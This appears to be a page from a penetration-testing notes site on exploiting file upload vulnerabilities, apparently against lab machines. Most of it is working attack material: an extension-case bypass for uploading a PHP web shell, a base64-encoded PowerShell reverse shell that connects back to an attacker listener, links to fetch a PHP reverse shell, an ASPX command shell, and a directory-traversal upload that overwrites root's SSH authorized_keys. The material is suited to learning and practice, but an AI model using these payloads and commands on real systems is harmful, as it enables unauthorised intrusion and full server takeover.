File Upload

Check:

Can you upload a file to your system ?

Three ways to exploit:

This web application allows users to upload executable files and execute that script and get the shell.
Combining two vulnerabilities, such as file upload and directory traversal, can be quite powerful. For instance, an attacker might exploit a file upload feature to upload an SSH key, replacing the original file on the victim's machine with their own version.
If we are allowed to upload .docx files or any file which can have macros in it then also we can get shell using this.

Using Executable Files

Below are the steps to do it.

Look for place from where we can upload content to the website.
Check which file types can be uploaded. Change the extension to uppercase or lowercase letters to see if it allows us to bypass the filter on the extension.
Upload the file.
You can upload reverse shell directly or simple-backdoor.php first and then run the command.

https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.pygist.githubusercontent.com

https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/refs/heads/master/src/reverse/php_reverse_shell.phpraw.githubusercontent.com

After successful upload visit the page or run using curl command to get the shell.

# Check where file can be uploaded
gobuster dir -u http://192.168.243.189/meteor/ -w /usr/share/wordlists/dirb/common.txt
# make a note of upload folder if found.

# Upload the file.
# -------
# First way:
# upload simple
cp /usr/share/webshells/php/simple-backdoor.php shell_command.php
mv shell_command.php shell_command.pHP # Changed as php extention is blocked.
#upload this file.

# Now access it using browser or curl command.
curl http://192.168.243.189/meteor/uploads/shell_command.pHP?cmd=whoami 

# To get the shell use powershell base64 encoded command.
python3 mkpsrevshell.py 192.168.45.154 80
sudo rlwrap nc -lnvp 80
curl http://192.168.243.189/meteor/uploads/shell_command.pHP?cmd=powershell%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANQA0ACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

# -----
# Second way:
# Directly upload reverse shell.
# Upload file and run below command.
wget https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/refs/heads/master/src/reverse/php_reverse_shell.php -o shell.pHP
# Change IP and port
sudo rlwrap nc -lnvp 80
curl http://192.168.243.189/meteor/uploads/shell.pHP 
# You will get the shell.

If we are not allowed to upload a file with a certain extension, we can upload a different type of file and then change its extension on the web server if renaming is permitted. For example, if uploading a file with a .php the extension is restricted, we could upload a .txt file and later rename it to .php on the server, provided we have permission to change file extensions.

Other example:

a There can be a situation in the upload of files that you upload on one port and can run from another port.

# Do a Nmap scan.
# You will note that there are two HTTP ports that is 80 and 8000
# Upload file at 8000 port and access it using port 80
echo "testing file" > test.txt
gobuster dir -u http://192.168.209.192/ -w /usr/share/wordlists/dirb/common.txt  -x txt
# The above command confirms that the file is there at port 80
locate cmdasp.aspx

# upload this file 
# access the file using http://192.168.209.192/cmdasp.aspx
# make powershell base64 reverse shell code.
python3 mkpsrevshell.py 192.168.45.154 80
sudo rlwrap nc -lnvp 80
# Run code in the website at port 80. You will get the shell.

Using Non-executable

In this we can make use of an unrestricted upload function with other attack like directory traversal.

# Check if we can upload any file or not.
# If yes then check if you can use directory directory traversal by changing ssh key.
# Generate ssh key in kali linux first
ssh-keygen
cat fileup.pub > authorized_keys
# Be careful with naming.

Unfortunately, we cannot know if the relative path was used for placing the file. It's possible that the web application's response merely echoed our filename and sanitized it internally.

# We can now replace Root ssh key.
# ROOT Generally dont have ssh set. :-(


-----------------------------4741312711405456152693445895
Content-Disposition: form-data; name="myFile"; filename="../../../../../../../root/.ssh/authorized_keys"
Content-Type: application/octet-stream

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJC6pFBPaEfIaDaE/Hvb6T8JRdqKl4GZzFZ4/6TBjwg0 kali@kali

-----------------------------4741312711405456152693445895--

# Upload the file and make changes
# Check what output you get.
# If successfull try to connect using ssh key.
rm ~/.ssh/known_hosts
ssh -p 2222 -i fileup [email protected]
# got shell.

PreviousRemote File Inclusion (RFI)NextOS Command Injection

Last updated 10 months ago